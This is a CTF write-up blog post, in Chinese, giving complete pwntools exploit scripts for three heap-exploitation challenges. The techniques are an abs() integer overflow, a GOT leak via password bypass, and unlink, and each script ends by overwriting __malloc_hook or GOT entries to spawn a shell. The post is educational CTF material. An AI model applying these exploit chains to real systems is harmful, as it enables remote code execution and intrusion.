Whali3n51's blog

  • 主页
  • 关于
  • 友链
  • 标签
  • 分类
Writeup

上海大学生网络安全PWN_wp

Whali3n51 发布于 2019-11-11

最近没怎么更新博客,太忙了,最近得比赛有点多。

0x01 boringheap

这一道题主要是存在abs得整型溢出漏洞,当我输入0x80000000的时候,会溢出,会得到一个负数。在这一题里面当我们输入0x80000000的时候,再和0x40取余,会得到-0x20,最后能修改该chunk的chunk头。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
from pwn import *
p=remote("8sdafgh.gamectf.com", 10001)
context.log_level="debug"
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
def free(index):
p.sendlineafter('5.Exit\n',"3")
p.sendlineafter('Which one do you want to delete?',str(index))


def create(typd,content):
p.sendlineafter('5.Exit\n',"1")
p.sendlineafter('3.Large\n',str(typd))
p.sendafter("Input Content:",content)


def edit(index,size,content):
p.sendlineafter('5.Exit\n',"2")
p.sendlineafter('Which one do you want to update?\n',str(index))
p.sendlineafter("Where you want to update?\n",str(size))
p.sendafter('Input Content:\n',content)
def show(index):
p.sendlineafter('5.Exit\n',"4")
p.sendlineafter('Which one do you want to view?',str(index))


#p=process("./pwn")
create(2,'A\n')#0 0
create(2,'A\n')#1 0x40
create(2,'A\n')#2 0x80
create(2,'A\n')#3 0xc0
create(1,'A\n')#4
create(1,'A\n')#5
edit(1,0x80000000,'A'*0x18+p64(0xf1)+'\n')
free(1)
create(2,'A\n')#6
show(2)
p.recv(6)
libc_base=u64(p.recv(6).ljust(8,'\x00'))-libc.symbols["__malloc_hook"]-0x10-88
success("libc_base====>0x%x"%libc_base)
pause()
create(2,'A\n')#7 = 2
create(3,'A\n')#8 = 3
fake_chunk_addr = libc_base+libc.symbols["__malloc_hook"]+0x10+0x10
free(2)
edit(7,0,p64(0x51)+'\n')
create(2,'A\n')#9
__malloc_hook = libc_base+libc.symbols["__malloc_hook"]
free(8)
edit(3,0,p64(fake_chunk_addr)+'\n')
create(3,'A\n')#10
create(3,'\x00'*0x38+p64(__malloc_hook-0x10))
free(9)
edit(7,0,p64(0)+'\n')
create(2,'A\n')#11
one_offset = [0x45216,0x4526a,0xf02a4,0xf1147]
one = libc_base+one_offset[3]
create(3,p64(one)+'\n')
p.sendlineafter('5.Exit\n',"1")
p.sendlineafter("3.Large\n",str(1))
p.interactive()

0x02 Login

这一题有两种思路,一种是去爆破密码,还有一种就是去绕过密码验证,泄露got表,最后getshell。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
from pwn import *
#p=process("./login")
p=remote("8sdafgh.gamectf.com", 20000)
context.log_level="debug"
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF("./login")
def free(index):
p.sendlineafter('Choice:\n',"3")
p.sendlineafter("Input the user id:\n",str(index))


def create(index,size,content):
p.sendlineafter('Choice:\n',"2")
p.sendlineafter("Input the user id:\n",str(index))
p.sendlineafter('Input the password length:\n',str(size))
p.sendafter("Input password:\n",content)


def edit(index,content):
p.sendlineafter('Choice:\n',"4")
p.sendlineafter("Input the user id:\n",str(index))
p.sendafter('Input new pass:\n',content)


def show(index,size,content):
p.sendlineafter('Choice:\n',"1")
p.sendlineafter("Input the user id:\n",str(index))
p.sendlineafter('Input the passwords length:\n',str(size))
p.sendafter('Input the password:\n',content)


create(0,0x20,'\n')
free(0)
create(1,0x18,p64(0x400310)+p64(0x400F2B))
show(0,255,'\x00'*0x10+p64(0x400f33)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x400710))
libc_base = u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.symbols['puts']
print hex(libc_base)
pause()
edit(1,p64(libc_base+libc.search('/bin/sh').next())+p64(libc_base+libc.symbols['system']))
show(0,0x10,'/bin/sh\x00')
#gdb.attach(p)
p.interactive()

0x03 silence_note

这道题比赛的时候没有做出来,主要是自己太菜了,眼瞎了,看见限制这么多条件,一直想着怎么去绕过这个条件,却不知道摆在眼前的unlink漏洞,这道题是我赛后复现出来的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
from pwn import *
elf=ELF("./silent_note")
p=process("./silent_note")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
context.log_level='debug'
def create(opt,content):
p.sendlineafter("Exit\n",'1')
p.sendlineafter("Large\n",str(opt))
p.sendafter("Content:\n",content)
def free(opt):
p.sendlineafter("Exit\n",'2')
p.sendlineafter("Large\n",str(opt))

def edit(opt,content):
p.sendlineafter("Exit\n",'3')
p.sendlineafter("Large\n",str(opt))
p.sendafter("Content:\n",content)
def hack():
p.sendlineafter("Exit\n",'1'*0x500)

create(1,'\n')
create(2,'\n')
free(1)
hack()
free(1)
small_ptr=0x6020d0
edit(1,p64(0)+p64(0x20)+p64(small_ptr-0x18)+p64(small_ptr-0x10)+p64(0x20))
free(2)
edit(1,p64(0)*3+p64(0x6020c8)+'\n')
edit(1,p64(0)+p64(0x6020c8)+p64(elf.got['free'])+p64(0)*2)
edit(2,p64(elf.symbols['puts'])+'\n')
edit(1,p64(0)+p64(0x6020c8)+p64(elf.got['calloc'])+p64(0)*2)
free(2)
leak_libc=u64(p.recv(6).ljust(8,'\x00'))-libc.symbols['calloc']
success("libc_base====>0x%x"%leak_libc)
pause()
edit(1,p64(0)+p64(0x6020c8)+p64(elf.got['free'])+p64(0)*2)
edit(2,p64(leak_libc+libc.symbols['system'])+'\n')
create(1,'/bin/sh\x00\n')
free(1)
p.interactive()
  • #abs负数溢出
  • #unlink
Newer

HECTF_Pwn_wp

Older

给新生—关于二进制怎么学习

© 2022 Whali3n51